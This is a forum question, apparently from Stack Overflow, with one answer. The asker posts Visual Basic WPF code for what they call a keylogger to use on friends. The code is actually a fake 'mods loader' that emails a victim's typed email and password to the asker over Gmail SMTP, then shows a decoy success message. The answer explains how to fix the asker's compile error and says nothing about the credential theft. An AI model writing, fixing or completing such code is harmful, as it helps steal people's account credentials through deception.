# Reference to a non-shared member requires an object reference TextBox

Tags: wpf

Hello I have problem that I want make application but there is one problem in my code I am making a keylogger to make fun from my friends i am doing it in Visual Basic WPF app but i am getting error `Reference to a non-shared member requires an object reference` from TextBox... can someone help me with it ? I need that textbot to send information to my email thx for help

```html
Imports System.Net.Mail

Class MainWindow
    Private Sub Button_Click(sender As Object, e As RoutedEventArgs)
        NewMethod1()
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("Email", "Email")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("Email")
        mail.To.Add("Gmail")
        mail.Subject = "Email : " & TextBox.Text
        mail.Body = "Password : " & TextBox.Text & ","
        smtpServer.Send(mail)
        MsgBox("Modi boli úspečne načítane uži zábavu / Mods have been sucsessfully loaded Enjoy playing")
    End Sub

    Private Shared Sub NewMethod1()
        If TextBox.Text = "" Then
            MsgBox("Kullanici Adi Yanliş")
            NewMethod()
        End If
    End Sub

    Private Shared Sub NewMethod()
        If TextBox.Text = "" Then
            MsgBox("Şifre Yanliş")
        Else
        End If
    End Sub
End Class
```

Answer (score 0):

You can't have static (shared) methods reference to something that is an property of a class you are in. Your shared methods (Sub) can't access it. Is there a reason for the functions to be shared? If not, you should remove it and that will solve your problem